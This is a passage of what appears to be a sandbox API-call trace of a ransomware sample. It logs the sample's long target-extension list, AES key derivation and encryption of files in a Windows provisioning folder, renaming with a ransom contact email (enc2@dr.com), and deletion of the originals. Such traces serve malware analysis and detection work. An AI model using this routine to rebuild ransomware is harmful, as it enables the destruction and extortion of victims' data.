tx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0174.067] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0174.067] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0174.067] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0174.068] ReadFile (in: hFile=0x390, lpBuffer=0xfde188, nNumberOfBytesToRead=0xd1c, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfde188*, lpNumberOfBytesRead=0x18a640*=0xd1c, lpOverlapped=0x0) returned 1
	[0174.072] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.072] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb440) returned 1
	[0174.074] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.075] CryptCreateHash (in: hProv=0xfcb440, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0174.075] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.075] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0174.076] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.076] CryptDeriveKey (in: hProv=0xfcb440, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb9470) returned 1
	[0174.076] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.076] CryptEncrypt (in: hKey=0xfb9470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0xd1c, dwBufLen=0xd1c | out: pbData=0x0*, pdwDataLen=0x18a20c*=0xd20) returned 1
	[0174.077] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.077] RtlMoveMemory (in: Destination=0xfdeeb0, Source=0xfde188, Length=0xd1c | out: Destination=0xfdeeb0) 
	[0174.077] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.077] CryptEncrypt (in: hKey=0xfb9470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdeeb0*, pdwDataLen=0x18a1ec*=0xd1c, dwBufLen=0xd20 | out: pbData=0xfdeeb0*, pdwDataLen=0x18a1ec*=0xd20) returned 1
	[0174.078] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.078] CryptDestroyKey (hKey=0xfb9470) returned 1
	[0174.078] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.078] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0174.078] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.078] CryptReleaseContext (hProv=0xfcb440, dwFlags=0x0) returned 1
	[0174.078] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.079] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0174.079] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.079] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0174.084] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 141
	[0174.085] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0174.087] WriteFile (in: hFile=0x39c, lpBuffer=0xfdeeb0*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfdeeb0*, lpNumberOfBytesWritten=0x18a648*=0xd20, lpOverlapped=0x0) returned 1
	[0174.090] CloseHandle (hObject=0x39c) returned 1
	[0174.093] CloseHandle (hObject=0x390) returned 1
	[0174.093] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml")) returned 1
	[0174.097] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml")) returned 0
	[0174.097] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa134b56b, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa134b56b, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa134b56b, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1
	[0174.097] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="..") returned 1
	[0174.097] lstrcmpW (lpString1="MasterDatastore.xml", lpString2=".") returned 1
	[0174.097] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\"
	[0174.098] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\", lpString2="MasterDatastore.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml"
	[0174.098] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml") returned 100
	[0174.098] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0174.098] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml", cchLength=0x64 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml") returned 0x64
	[0174.098] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.098] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0174.098] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml"
	[0174.099] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml") returned 100
	[0174.099] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.099] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.099] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0174.099] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.100] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0174.100] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0174.100] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0174.100] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0174.101] ReadFile (in: hFile=0x390, lpBuffer=0xfdcd58, nNumberOfBytesToRead=0x10f, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdcd58*, lpNumberOfBytesRead=0x18a640*=0x10f, lpOverlapped=0x0) returned 1
	[0174.104] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.104] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcaf78) returned 1
	[0174.109] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.110] CryptCreateHash (in: hProv=0xfcaf78, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0174.113] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.114] CryptHashData (hHash=0xfb9030, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0174.114] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.114] CryptDeriveKey (in: hProv=0xfcaf78, Algid=0x6610, hBaseData=0xfb9030, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb94b0) returned 1
	[0174.120] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.121] CryptEncrypt (in: hKey=0xfb94b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x10f, dwBufLen=0x10f | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x110) returned 1
	[0174.121] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.124] RtlMoveMemory (in: Destination=0xfdc6a8, Source=0xfdcd58, Length=0x10f | out: Destination=0xfdc6a8) 
	[0174.124] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.125] CryptEncrypt (in: hKey=0xfb94b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdc6a8*, pdwDataLen=0x18a1ec*=0x10f, dwBufLen=0x110 | out: pbData=0xfdc6a8*, pdwDataLen=0x18a1ec*=0x110) returned 1
	[0174.127] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.128] CryptDestroyKey (hKey=0xfb94b0) returned 1
	[0174.128] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.131] CryptDestroyHash (hHash=0xfb9030) returned 1
	[0174.131] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.131] CryptReleaseContext (hProv=0xfcaf78, dwFlags=0x0) returned 1
	[0174.132] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.134] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0174.137] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.137] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0174.142] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 142
	[0174.142] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0174.146] WriteFile (in: hFile=0x39c, lpBuffer=0xfdc6a8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfdc6a8*, lpNumberOfBytesWritten=0x18a648*=0x110, lpOverlapped=0x0) returned 1
	[0174.152] CloseHandle (hObject=0x39c) returned 1
	[0174.153] CloseHandle (hObject=0x390) returned 1
	[0174.154] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml")) returned 1
	[0174.159] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml")) returned 0
